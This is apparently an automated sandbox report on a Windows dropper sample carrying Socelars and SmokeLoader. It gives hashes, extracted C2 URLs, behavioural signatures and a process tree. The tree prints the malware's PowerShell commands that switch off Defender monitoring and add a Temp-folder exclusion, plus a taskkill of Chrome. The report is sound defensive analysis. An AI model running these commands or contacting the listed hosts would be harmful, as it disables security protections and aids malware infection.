Analysis
-
max time kernel
13s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
26/12/2021, 18:41
Static task
static1
Behavioral task
behavioral1
Sample
2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
Resource
win7-en-20211208
General
-
Target
2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
-
Size
4.4MB
-
MD5
244f3fcae34a514dd3e78f3d4d72f92a
-
SHA1
5ac41859cefd7ad0536b36c7e82f33e702514fe2
-
SHA256
2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df
-
SHA512
245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4180 3348 rundll32.exe 115 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab2f-171.dat family_socelars behavioral2/files/0x000500000001ab2f-208.dat family_socelars -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
resource yara_rule behavioral2/files/0x000500000001ab21-123.dat aspack_v212_v242 behavioral2/files/0x000500000001ab21-125.dat aspack_v212_v242 behavioral2/files/0x000500000001ab22-122.dat aspack_v212_v242 behavioral2/files/0x000500000001ab22-127.dat aspack_v212_v242 behavioral2/files/0x000500000001ab24-130.dat aspack_v212_v242 behavioral2/files/0x000500000001ab24-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
pid Process 1828 setup_installer.exe 1104 setup_install.exe 2484 Sun0792bfe25c4e6f.exe 2864 Sun07426f49ca3.exe 952 Sun07853f394a6f2.exe 3672 Sun07689b7dd63a1a2e.exe 3680 Sun074812abe11c68090.exe 3244 Sun0705fdd6f3fa.exe 1572 Sun07aef696b81cc09ee.exe 1632 Sun07fbac34efb13666.exe 2192 Sun074dcdeb3534e450.exe 2584 Sun079abff5ef.exe 2944 Sun07b9107c074617.exe 2596 Sun076d6b9f10493573.exe 2220 Sun074812abe11c68090.tmp 4016 Sun074812abe11c68090.exe 1048 Sun074812abe11c68090.tmp -
Loads dropped DLL 8 IoCs
pid Process 1104 setup_install.exe 1104 setup_install.exe 1104 setup_install.exe 1104 setup_install.exe 1104 setup_install.exe 1104 setup_install.exe 2220 Sun074812abe11c68090.tmp 1048 Sun074812abe11c68090.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 freegeoip.app 67 freegeoip.app 70 freegeoip.app 107 ipinfo.io 108 ipinfo.io 109 ipinfo.io 24 ip-api.com 63 freegeoip.app -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
pid pid_target Process procid_target 4020 3244 WerFault.exe 88 3076 1104 WerFault.exe 70 3984 3244 WerFault.exe 88 2004 3244 WerFault.exe 88 3116 3244 WerFault.exe 88 4288 3244 WerFault.exe 88 4568 2584 WerFault.exe 98 4220 3244 WerFault.exe 88 4152 3244 WerFault.exe 88 4456 3244 WerFault.exe 88 4400 3244 WerFault.exe 88 780 3884 WerFault.exe 161 5044 2972 WerFault.exe 142 4456 2972 WerFault.exe 142 4292 2972 WerFault.exe 142 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun07fbac34efb13666.exe -
Kills process with taskkill 2 IoCs
pid Process 2900 taskkill.exe 4128 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 1632 Sun07fbac34efb13666.exe 1632 Sun07fbac34efb13666.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 4020 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 3076 WerFault.exe 736 powershell.exe 1036 powershell.exe 3076 WerFault.exe 3076 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe 3984 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 3672 Sun07689b7dd63a1a2e.exe Token: SeDebugPrivilege 2864 Sun07426f49ca3.exe Token: SeCreateTokenPrivilege 2584 Sun079abff5ef.exe Token: SeAssignPrimaryTokenPrivilege 2584 Sun079abff5ef.exe Token: SeLockMemoryPrivilege 2584 Sun079abff5ef.exe Token: SeIncreaseQuotaPrivilege 2584 Sun079abff5ef.exe Token: SeMachineAccountPrivilege 2584 Sun079abff5ef.exe Token: SeTcbPrivilege 2584 Sun079abff5ef.exe Token: SeSecurityPrivilege 2584 Sun079abff5ef.exe Token: SeTakeOwnershipPrivilege 2584 Sun079abff5ef.exe Token: SeLoadDriverPrivilege 2584 Sun079abff5ef.exe Token: SeSystemProfilePrivilege 2584 Sun079abff5ef.exe Token: SeSystemtimePrivilege 2584 Sun079abff5ef.exe Token: SeProfSingleProcessPrivilege 2584 Sun079abff5ef.exe Token: SeIncBasePriorityPrivilege 2584 Sun079abff5ef.exe Token: SeCreatePagefilePrivilege 2584 Sun079abff5ef.exe Token: SeCreatePermanentPrivilege 2584 Sun079abff5ef.exe Token: SeBackupPrivilege 2584 Sun079abff5ef.exe Token: SeRestorePrivilege 2584 Sun079abff5ef.exe Token: SeShutdownPrivilege 2584 Sun079abff5ef.exe Token: SeDebugPrivilege 2584 Sun079abff5ef.exe Token: SeAuditPrivilege 2584 Sun079abff5ef.exe Token: SeSystemEnvironmentPrivilege 2584 Sun079abff5ef.exe Token: SeChangeNotifyPrivilege 2584 Sun079abff5ef.exe Token: SeRemoteShutdownPrivilege 2584 Sun079abff5ef.exe Token: SeUndockPrivilege 2584 Sun079abff5ef.exe Token: SeSyncAgentPrivilege 2584 Sun079abff5ef.exe Token: SeEnableDelegationPrivilege 2584 Sun079abff5ef.exe Token: SeManageVolumePrivilege 2584 Sun079abff5ef.exe Token: SeImpersonatePrivilege 2584 Sun079abff5ef.exe Token: SeCreateGlobalPrivilege 2584 Sun079abff5ef.exe Token: 31 2584 Sun079abff5ef.exe Token: 32 2584 Sun079abff5ef.exe Token: 33 2584 Sun079abff5ef.exe Token: 34 2584 Sun079abff5ef.exe Token: 35 2584 Sun079abff5ef.exe Token: SeRestorePrivilege 3076 WerFault.exe Token: SeBackupPrivilege 3076 WerFault.exe Token: SeRestorePrivilege 4020 WerFault.exe Token: SeBackupPrivilege 4020 WerFault.exe Token: SeBackupPrivilege 4020 WerFault.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 736 powershell.exe Token: SeDebugPrivilege 4020 WerFault.exe Token: SeDebugPrivilege 3076 WerFault.exe Token: SeDebugPrivilege 3984 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3116 wrote to memory of 1828 3116 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 69 PID 3116 wrote to memory of 1828 3116 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 69 PID 3116 wrote to memory of 1828 3116 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe 69 PID 1828 wrote to memory of 1104 1828 setup_installer.exe 70 PID 1828 wrote to memory of 1104 1828 setup_installer.exe 70 PID 1828 wrote to memory of 1104 1828 setup_installer.exe 70 PID 1104 wrote to memory of 1992 1104 setup_install.exe 73 PID 1104 wrote to memory of 1992 1104 setup_install.exe 73 PID 1104 wrote to memory of 1992 1104 setup_install.exe 73 PID 1104 wrote to memory of 1140 1104 setup_install.exe 74 PID 1104 wrote to memory of 1140 1104 setup_install.exe 74 PID 1104 wrote to memory of 1140 1104 setup_install.exe 74 PID 1140 wrote to memory of 736 1140 cmd.exe 75 PID 1140 wrote to memory of 736 1140 cmd.exe 75 PID 1140 wrote to memory of 736 1140 cmd.exe 75 PID 1992 wrote to memory of 1036 1992 cmd.exe 76 PID 1992 wrote to memory of 1036 1992 cmd.exe 76 PID 1992 wrote to memory of 1036 1992 cmd.exe 76 PID 1104 wrote to memory of 1648 1104 setup_install.exe 77 PID 1104 wrote to memory of 1648 1104 setup_install.exe 77 PID 1104 wrote to memory of 1648 1104 setup_install.exe 77 PID 1104 wrote to memory of 3996 1104 setup_install.exe 78 PID 1104 wrote to memory of 3996 1104 setup_install.exe 78 PID 1104 wrote to memory of 3996 1104 setup_install.exe 78 PID 1104 wrote to memory of 2844 1104 setup_install.exe 79 PID 1104 wrote to memory of 2844 1104 setup_install.exe 79 PID 1104 wrote to memory of 2844 1104 setup_install.exe 79 PID 1104 wrote to memory of 3220 1104 setup_install.exe 80 PID 1104 wrote to memory of 3220 1104 setup_install.exe 80 PID 1104 wrote to memory of 3220 1104 setup_install.exe 80 PID 1104 wrote to memory of 3216 1104 setup_install.exe 81 PID 1104 wrote to memory of 3216 1104 setup_install.exe 81 PID 1104 wrote to memory of 3216 1104 setup_install.exe 81 PID 1104 wrote to memory of 856 1104 setup_install.exe 82 PID 1104 wrote to memory of 856 1104 setup_install.exe 82 PID 1104 wrote to memory of 856 1104 setup_install.exe 82 PID 1104 wrote to memory of 408 1104 setup_install.exe 84 PID 1104 wrote to memory of 408 1104 setup_install.exe 84 PID 1104 wrote to memory of 408 1104 setup_install.exe 84 PID 1104 wrote to memory of 1124 1104 setup_install.exe 83 PID 1104 wrote to memory of 1124 1104 setup_install.exe 83 PID 1104 wrote to memory of 1124 1104 setup_install.exe 83 PID 1648 wrote to memory of 2484 1648 cmd.exe 95 PID 1648 wrote to memory of 2484 1648 cmd.exe 95 PID 1648 wrote to memory of 2484 1648 cmd.exe 95 PID 1104 wrote to memory of 688 1104 setup_install.exe 94 PID 1104 wrote to memory of 688 1104 setup_install.exe 94 PID 1104 wrote to memory of 688 1104 setup_install.exe 94 PID 1104 wrote to memory of 1912 1104 setup_install.exe 93 PID 1104 wrote to memory of 1912 1104 setup_install.exe 93 PID 1104 wrote to memory of 1912 1104 setup_install.exe 93 PID 3996 wrote to memory of 2864 3996 cmd.exe 92 PID 3996 wrote to memory of 2864 3996 cmd.exe 92 PID 2844 wrote to memory of 952 2844 cmd.exe 91 PID 2844 wrote to memory of 952 2844 cmd.exe 91 PID 2844 wrote to memory of 952 2844 cmd.exe 91 PID 1104 wrote to memory of 964 1104 setup_install.exe 85 PID 1104 wrote to memory of 964 1104 setup_install.exe 85 PID 1104 wrote to memory of 964 1104 setup_install.exe 85 PID 1104 wrote to memory of 2364 1104 setup_install.exe 90 PID 1104 wrote to memory of 2364 1104 setup_install.exe 90 PID 1104 wrote to memory of 2364 1104 setup_install.exe 90 PID 3220 wrote to memory of 3672 3220 cmd.exe 86 PID 3220 wrote to memory of 3672 3220 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0792bfe25c4e6f.exeSun0792bfe25c4e6f.exe5⤵
- Executes dropped EXE
PID:2484 -
C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe"C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe"6⤵PID:4904
-
-
C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe"C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe"6⤵PID:2972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 6647⤵
- Program crash
PID:5044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 6807⤵
- Program crash
PID:4456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 6407⤵
- Program crash
PID:4292
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe"C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe"6⤵PID:4196
-
-
C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe"C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe"6⤵PID:4856
-
-
C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe"C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe"6⤵PID:4288
-
-
C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe"C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe"6⤵PID:4872
-
-
C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe"C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe"6⤵PID:2000
-
-
C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe"C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe"6⤵PID:1272
-
-
C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe"C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe"6⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\7zS3DE6.tmp\Install.exe.\Install.exe7⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\7zS4A69.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:4600
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe"C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe"6⤵PID:356
-
-
C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe"C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe"6⤵PID:3884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 4007⤵
- Program crash
PID:780
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe"C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe"6⤵PID:2196
-
-
C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"6⤵PID:2544
-
C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"7⤵PID:4172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe"C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe"6⤵PID:3676
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07426f49ca3.exeSun07426f49ca3.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07853f394a6f2.exeSun07853f394a6f2.exe5⤵
- Executes dropped EXE
PID:952 -
C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe"C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe"6⤵PID:4728
-
-
C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe"C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe"6⤵PID:4332
-
-
C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe"C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe"6⤵PID:4368
-
-
C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe"C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe"6⤵PID:1940
-
-
C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe"C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe"6⤵PID:4908
-
-
C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe"C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe"6⤵PID:512
-
C:\Users\Admin\AppData\Local\Temp\7zS37DB.tmp\Install.exe.\Install.exe7⤵PID:1328
-
C:\Users\Admin\AppData\Local\Temp\7zS42E7.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:4224
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe"C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe"6⤵PID:3172
-
-
C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe"C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe"6⤵PID:3844
-
-
C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe"C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe"6⤵PID:2952
-
-
C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"6⤵PID:4840
-
C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"7⤵PID:4444
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe"C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe"6⤵PID:2456
-
-
C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe"C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe"6⤵PID:4752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07689b7dd63a1a2e.exeSun07689b7dd63a1a2e.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe4⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07aef696b81cc09ee.exeSun07aef696b81cc09ee.exe5⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe4⤵PID:856
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07fbac34efb13666.exeSun07fbac34efb13666.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone4⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0705fdd6f3fa.exeSun0705fdd6f3fa.exe /mixone5⤵
- Executes dropped EXE
PID:3244 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6566⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6726⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 7726⤵
- Program crash
PID:2004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 8086⤵
- Program crash
PID:3116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 8406⤵
- Program crash
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 8966⤵
- Program crash
PID:4220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 10646⤵
- Program crash
PID:4152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 12646⤵
- Program crash
PID:4456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 13046⤵
- Program crash
PID:4400
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe4⤵PID:408
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exeSun074812abe11c68090.exe5⤵
- Executes dropped EXE
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp"C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp" /SL5="$30134,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe"C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT7⤵
- Executes dropped EXE
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp"C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1048
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe4⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun076d6b9f10493573.exeSun076d6b9f10493573.exe5⤵
- Executes dropped EXE
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe4⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074dcdeb3534e450.exeSun074dcdeb3534e450.exe5⤵
- Executes dropped EXE
PID:2192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun079abff5ef.exe4⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun079abff5ef.exeSun079abff5ef.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2900
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 16646⤵
- Program crash
PID:4568
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe4⤵PID:688
-
C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exeSun07b9107c074617.exe5⤵
- Executes dropped EXE
PID:2944 -
